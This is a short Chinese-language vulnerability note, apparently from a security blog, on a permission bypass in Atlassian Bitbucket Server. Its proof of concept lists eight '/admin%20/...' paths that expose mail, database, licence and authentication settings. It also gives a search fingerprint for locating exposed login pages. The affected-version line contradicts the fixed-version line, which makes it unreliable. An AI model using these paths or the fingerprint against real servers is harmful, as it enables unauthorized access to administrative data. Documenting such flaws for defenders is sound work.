Bitbucket 登录绕过漏洞

漏洞描述

此错误已修复并部署在 Bitbucket Server > 4.8 上。Bitbucket 由 Atlassian 团队开发。其中出现了一个通过 %20 绕过权限的漏洞,导致任意用户可获取敏感数据。

漏洞影响

Bitbucket Server > 4.8

网络测绘

title=”Log in – Bitbucket”

漏洞复现

登录页面

20240411120231425-1646803634647-f4c4a968-440a-4dd0-8e1b-24955401b1f4.7cc0f47a_2024-04-11_12-02-00 (1)

验证POC

/admin%20/mail-server
/admin%20/db
/admin%20/db/edit
/admin%20/license
/admin%20/logging
/admin%20/server-settings
/admin%20/authentication
/admin%20/avatars

20240411120435802-image-20220318011106473.c1c0d5af_2024-04-11_12-03-30 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容